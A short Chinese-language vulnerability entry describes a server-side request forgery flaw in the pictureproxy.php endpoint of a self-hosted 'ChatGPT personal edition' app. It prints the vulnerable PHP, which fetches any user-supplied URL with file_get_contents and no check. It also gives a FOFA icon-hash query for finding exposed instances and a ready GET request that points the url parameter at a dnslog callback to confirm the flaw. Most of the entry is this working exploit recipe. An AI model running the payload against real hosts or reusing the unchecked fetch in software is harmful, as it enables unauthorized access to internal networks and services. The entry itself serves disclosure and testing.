C1-2ChatGPT-SSRF
漏洞描述:
ChatGPT个人专用版 pictureproxy.php 接口处存在服务器请求伪造漏洞,由于接口处没有对url参数进行校验,攻击者可以通过url参数注入任意URL让应用发出任意请求,导致系统处于极不安全状态。
漏洞代码
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
网站图片:
网络测绘:
fofa语法:
FOFA:icon_hash=“-1999760920”
漏洞复现:
payload:
GET /pictureproxy.php?url=http://xxxxx.dnslog.cn HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
效果图:
Dnslog验证